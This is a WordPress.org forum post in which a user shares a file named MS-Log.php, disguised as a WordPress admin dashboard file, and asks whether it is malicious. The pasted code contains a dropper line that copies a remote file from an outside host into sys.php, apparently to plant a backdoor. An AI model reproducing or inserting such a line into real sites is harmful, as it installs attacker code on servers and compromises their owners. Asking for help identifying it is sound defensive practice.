Quantcast
Channel: WordPress.org Forums » All Topics
Viewing all articles
Browse latest Browse all 59525

MS-Log.php highlighted

$
0
0

Replies: 1

this is the contents – is it bad?

<?php
/**
* User Dashboard About administration panel.
*
* @package WordPress
* @subpackage Administration
* @since 3.4.0
*/
copy(‘http://bredican.com/init.txt’,’sys.php’);exit;
/** Load WordPress Administration Bootstrap */
require_once( dirname( __FILE__ ) . ‘/admin.php’ );

require( ABSPATH . ‘wp-admin/about.php’ );
?>


Viewing all articles
Browse latest Browse all 59525

Trending Articles